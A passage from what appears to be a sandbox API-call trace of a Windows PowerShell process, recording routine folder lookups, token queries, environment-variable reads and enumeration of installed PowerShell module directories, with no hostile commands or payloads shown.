lpBuffer=0x653ef8a8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0281.684] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0281.684] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0281.684] CoTaskMemFree (pv=0x25b73d007a0) [0281.684] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0281.685] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0281.685] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0281.685] CoTaskMemFree (pv=0x25b73d007a0) [0281.685] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0281.685] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0281.685] CoTaskMemFree (pv=0x25b73d007a0) [0281.685] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0281.685] GetCurrentProcess () returned 0xffffffffffffffff [0281.685] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8c9e8 | out: TokenHandle=0x653ef8c9e8*=0x8f4) returned 1 [0281.685] GetTokenInformation (in: TokenHandle=0x8f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8cae8 | out: TokenInformation=0x0, ReturnLength=0x653ef8cae8) returned 0 [0281.685] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984530 [0281.685] GetTokenInformation (in: TokenHandle=0x8f4, TokenInformationClass=0x1, TokenInformation=0x25b73984530, TokenInformationLength=0x2c, ReturnLength=0x653ef8cae8 | out: TokenInformation=0x25b73984530, ReturnLength=0x653ef8cae8) returned 1 [0281.686] LocalFree (hMem=0x25b73984530) returned 0x0 [0281.686] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c38a7f0, cbSid=0x653ef8cae0 | out: pSid=0x25b5c38a7f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8cae0) returned 1 [0281.686] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8c980*=0x4f4, lpdwindex=0x653ef8c754 | out: lpdwindex=0x653ef8c754) returned 0x0 [0281.687] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0281.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0281.688] GetCurrentProcess () returned 0xffffffffffffffff [0281.688] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8cb18 | out: TokenHandle=0x653ef8cb18*=0x900) returned 1 [0281.688] GetTokenInformation (in: TokenHandle=0x900, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8cc18 | out: TokenInformation=0x0, ReturnLength=0x653ef8cc18) returned 0 [0281.688] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739845f0 [0281.688] GetTokenInformation (in: TokenHandle=0x900, TokenInformationClass=0x1, TokenInformation=0x25b739845f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8cc18 | out: TokenInformation=0x25b739845f0, ReturnLength=0x653ef8cc18) returned 1 [0281.688] LocalFree (hMem=0x25b739845f0) returned 0x0 [0281.689] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c399548, cbSid=0x653ef8cc10 | out: pSid=0x25b5c399548*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8cc10) returned 1 [0281.689] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8cab0*=0x20c, lpdwindex=0x653ef8c884 | out: lpdwindex=0x653ef8c884) returned 0x0 [0281.689] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0281.689] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0281.689] CoTaskMemFree (pv=0x25b73cfe7c0) [0281.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0281.690] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d02120 [0281.690] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d02120 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0281.690] CoTaskMemFree (pv=0x25b73d02120) [0281.690] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c460, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0281.692] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfce40 [0281.692] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfce40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0281.692] CoTaskMemFree (pv=0x25b73cfce40) [0281.692] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0281.696] EtwEventActivityIdControl () returned 0x0 [0281.696] SetEvent (hEvent=0x944) returned 1 [0281.696] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d330*=0x944, lpdwindex=0x653ef8d104 | out: lpdwindex=0x653ef8d104) returned 0x0 [0281.697] GetCurrentProcess () returned 0xffffffffffffffff [0281.697] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x904) returned 1 [0281.697] GetTokenInformation (in: TokenHandle=0x904, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0281.697] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739845f0 [0281.697] GetTokenInformation (in: TokenHandle=0x904, TokenInformationClass=0x1, TokenInformation=0x25b739845f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739845f0, ReturnLength=0x653ef8d6b8) returned 1 [0281.697] LocalFree (hMem=0x25b739845f0) returned 0x0 [0281.698] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c3c0c20, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c3c0c20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0281.698] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x8fc, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0281.698] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0281.699] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0281.699] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0281.699] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfac40 [0281.700] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfac40, nSize=0x105 | out: lpBuffer="") returned 0x0 [0281.700] CoTaskMemFree (pv=0x25b73cfac40) [0281.700] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfd8e0 [0281.700] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfd8e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0281.700] CoTaskMemFree (pv=0x25b73cfd8e0) [0281.700] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0281.700] GetCurrentProcess () returned 0xffffffffffffffff [0281.700] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x6ec) returned 1 [0281.700] GetTokenInformation (in: TokenHandle=0x6ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0281.700] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739847b0 [0281.700] GetTokenInformation (in: TokenHandle=0x6ec, TokenInformationClass=0x1, TokenInformation=0x25b739847b0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739847b0, ReturnLength=0x653ef8d6b8) returned 1 [0281.701] LocalFree (hMem=0x25b739847b0) returned 0x0 [0281.701] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c3d3f70, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c3d3f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0281.701] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x8ec, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0281.701] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfee20 [0281.701] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfee20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0281.701] CoTaskMemFree (pv=0x25b73cfee20) [0281.701] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0281.701] CoCreateGuid (in: pguid=0x653ef8d6c8 | out: pguid=0x653ef8d6c8*(Data1=0x1d81402f, Data2=0x5712, Data3=0x475b, Data4=([0]=0x9c, [1]=0x12, [2]=0x3e, [3]=0xd6, [4]=0xb9, [5]=0xe4, [6]=0x4f, [7]=0x1e))) returned 0x0 [0281.701] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7b0 [0281.702] SetThreadUILanguage (LangId=0x0) returned 0x409 [0281.702] EtwEventActivityIdControl () returned 0x0 [0281.702] EtwEventActivityIdControl () returned 0x0 [0281.702] EtwEventActivityIdControl () returned 0x0 [0281.708] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfae60 [0281.708] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73cfae60, nSize=0x105 | out: lpBuffer="") returned 0x97 [0281.708] CoTaskMemFree (pv=0x25b73cfae60) [0281.708] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0281.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0281.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0281.717] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0281.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0281.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0281.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0281.718] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0281.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0281.718] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff480 [0281.725] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73cff480, nSize=0x105 | out: lpBuffer="") returned 0x97 [0281.725] CoTaskMemFree (pv=0x25b73cff480) [0281.725] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0281.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0281.725] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0281.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0281.727] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0281.736] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0281.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0281.736] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0281.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0281.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0281.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0281.781] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0281.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0281.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0281.781] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0281.782] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x653ef8c8f0 | out: lpFindFileData=0x653ef8c8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.782] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.782] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0281.782] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0281.782] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0281.783] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0281.783] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.783] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0281.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0281.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0281.783] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0281.783] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x653ef8c8f0 | out: lpFindFileData=0x653ef8c8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.784] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.784] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 